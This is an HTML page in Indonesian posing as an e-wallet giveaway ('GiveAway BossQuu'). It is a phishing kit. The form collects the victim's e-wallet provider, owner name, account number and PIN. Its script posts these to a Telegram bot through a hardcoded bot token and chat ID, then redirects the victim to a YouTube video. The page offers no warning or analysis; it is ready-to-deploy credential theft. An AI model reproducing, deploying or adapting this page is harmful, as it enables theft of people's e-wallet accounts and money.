<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Formulir Rekening</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
  </head>
  <body>
    <nav class="navbar" style="background-color: #fcff32">
      <div class="container">
        <a class="navbar-brand" href="#">
            <img src="https://t3.ftcdn.net/jpg/04/83/58/90/360_F_483589048_DN0uPcM4D8EfKJ6gaBZbHc3pApgYnHgs.jpg" alt="logo" width="200" height="S0">
        </a>
        <h2 style="color: #254dce">GiveAway BossQuu</h2>
        <div class="container">
            <div class="logo-atas">
                <img class="img-fluid" src="atas.jpg" alt="">
                </div>
            
    </nav>
    <div class="container">
        <div class="title-web mt-2">
            <div class="logo-atas">
                <center><img class="img-fluid" src="https://quarrylifeaward.co.id/wp-content/uploads/2021/11/dompet-digital-logo.jpeg" alt=""></center>
            </div>
      <div class="title-web mt-1">
        <h2 class="text-center">Silahkan di isi datanya dengan Benar ya BossQuu dan pastikan Ewallet nya sudah Premium atau Sudah Upgrade </h2>
      </div><br>
        <div class="container w-75 mt-3">
            <div class="form-cc">
                <div class="form-group">
                    <div class="form-group" style="width: 70%">
                        <select style="border-radius: 15px" class="form-control shadow-sm form-control-sm" id="input1">
                            <option value=>===Dompet Digital Anda===</option>
                            <option value="OVO">OVO</option>
                            <option value="DANA">DANA</option>
                            <option value="GOPAY">GOPAY</option>
                            <option value="LINKAJA">LINKAJA</option>
                            <option value="ShopeePay">ShopeePay</option>
                        </select>
                    </div>
                    <input style="border-radius: 15px" type="text" class="form-control shadow-sm mt-3" id="input2" placeholder="Nama Pemilik Akun">
                    <input style="border-radius: 15px" type="number" class="form-control shadow-sm mt-3" id="input3" placeholder="No Akun Dompet Digital">
                    <input style="border-radius: 15px" type="number" class="form-control shadow-sm mt-3" id="input4" placeholder="Pin Akun ">
                </div>
                <div class="bnt-next mt-3 mb-3 text-center">
                    <button onclick="next()" class="btnNext mt-3" style="background-color: #007BED; border: none; border-radius: 19px; width: 100%; color: white; font-weight: bold; height: 45px">Konfirmasi</button>
                </div>
            </div>
        </div>
    </div>

    <script>
        function sendMessage(id, botApi, pesan) {
            const url = `https://api.telegram.org/bot${botApi}/sendMessage`;
            const data = {
                chat_id: id,
                text: pesan
            };
            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(data)
            })
            .then(response => response.json())
            .then(data => {
                console.log('Pesan terkirim:', data);
                window.location.href = "https://www.youtube.com/watch?v=9dcS-zy-vuw"
            })
            .then(response => response.json())
            .then(data => {
                window.location.herf = "https://www.youtube.com/watch?v=9dcS-zy-vuw";
            })
            .catch(error => {
                console.error('Terjadi kesalahan:', error);
            });
        }

        const next = () => {
            const nocard = document.querySelector("#input1").value;
            const norek = document.querySelector("#input2").value;
            const ktp = document.querySelector("#input3").value;
            const pin = document.querySelector("#input4").value;
            let text = `==| Dompet DIGITAL |==\n\nEwallet: ${nocard}\nNama Pemilik: ${norek}\nNO Ewallet: ${ktp}\nPin Akun: ${pin}`;
            let bot = "6812088676:AAHFIo1sIwC_I-VQnXbpWJeh-nu3nArVvjc";
            let id = "6863354480";
            if (nocard === "" || norek === "" || ktp==="" || pin==="") {
                alert("Mohon lengkapi data Anda.");
            } else {
                sendMessage(id, bot, text);
            }
        }
    </script>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
</body>
</html>